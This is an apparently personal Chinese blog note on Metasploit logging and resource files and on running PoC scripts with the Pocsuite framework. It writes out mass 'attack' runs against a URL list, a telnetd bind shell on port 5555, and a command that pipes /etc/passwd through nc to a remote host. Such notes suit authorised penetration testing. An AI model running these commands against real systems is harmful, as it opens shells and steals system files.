pocsuite笔记链接

Metasploit

输出到文件

msf6 > spool log.txt	#开启日志,此后命令执行的结果都保存到日志中
msf6 > spool off	#关闭日志

文件启动

1.首先将msf命令写入到cmd.rc中
2.然后读配置文件
msfconsole -r cmd.rc

PocSuite

PoC利用框架

  • 按照模板改写已有PoC
    • 按照框架获取url
    • 构建payload发送requests请求
    • 根据返回值生成result字典
    • parse_output解析输出,返回成功或失败
  • 使用Pocuite调用PoC
#构造url.txt,每条记录可以像下面这样:
https://10.10.10.10:443
#使用rce.py这个PoC去攻击url.txt文件里所有的url
python pocsuite.py -f url.txt -r rce.py --attack --command "whoami" #--command参数可以传递给rce.py
  • 关于PoC验证

    • 直接反弹shell到vps上,比如:

      python rce.py --command "telnetd -l /bin/sh -p 5555" #本地启一个telnet服务运行shell进程
      telnet 10.10.10.10 5555 #建立telnet连接
      
    • 如果命令执行有远程返回值,直接看返回值

    • 如果没有返回值,将命令执行结果通过nc发送给指定host,如下:

      python rce.py --command "cat /etc/passwd | nc 10.10.10.10 5555"
      
      • ceye上申请域名,用于接收执行结果

      • 在vps上监听端口,接收执行结果

        nc -lp 5555
        
  • 参考:

    https://blog.csdn.net/weixin_44426869/article/details/103962994

posted @ 2022-10-05 08:59  z5onk0  阅读(55)  评论(0编辑  收藏  举报